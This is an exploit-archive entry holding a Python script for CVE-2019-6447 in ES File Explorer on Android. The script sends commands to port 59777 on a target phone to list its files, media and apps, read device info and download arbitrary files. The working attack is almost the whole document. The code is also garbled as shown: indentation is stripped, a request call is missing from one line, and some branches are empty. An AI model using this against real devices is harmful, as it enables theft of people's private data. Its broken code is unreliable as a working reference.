ES File Explorer Arbitrary File Read

ES File Explorer version arbitrary file read exploit.

MD5 | 3c25d5c9cc6d583b07aa0211035656b6

# Exploit Title: ES File Explorer - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.
# Tested on: Android
# CVE : CVE-2019-6447

import requests
import json
import ast
import sys

if len(sys.argv) < 3:
print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
print("[-] WRONG COMMAND!")
print("Available commands : ")
print(" listFiles : List all Files.")
print(" listPics : List all Pictures.")
print(" listVideos : List all videos.")
print(" listAudios : List all audios.")
print(" listApps : List Applications installed.")
print(" listAppsSystem : List System apps.")
print(" listAppsPhone : List Communication related apps.")
print(" listAppsSdcard : List apps on the SDCard.")
print(" listAppsAll : List all Application.")
print(" getFile : Download a file.")
print(" getDeviceInfo : Get device info.")

print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")
print("| Coded By : Nehal a.k.a PwnerSec |")

header = {"Content-Type" : "application/json"}
proxy = {"http":"", "https":""}

def httpPost(cmd):
data = json.dumps({"command":cmd})
response =, headers=header, data=data)
return ast.literal_eval(response.text)

def parse(text, keys):
for dic in text:
for key in keys:
print(f"{key} : {dic[key]}")

def do_listing(cmd):
response = httpPost(cmd)
if len(response) == 0:
keys = []
keys = list(response[0].keys())
parse(response, keys)

if cmd in listCmds:

elif cmd == cmds[9]:
if len(sys.argv) != 4:
print("[+] Include file name to download.")
elif sys.argv[3][0] != '/':
print("[-] You need to provide full path of the file.")
path = sys.argv[3]
print("[+] Downloading file...")
response = requests.get(url + path)
with open('out.dat','wb') as wf:
print("[+] Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
response = httpPost(cmd)
keys = list(response.keys())
for key in keys:
print(f"{key} : {response[key]}")

Related Posts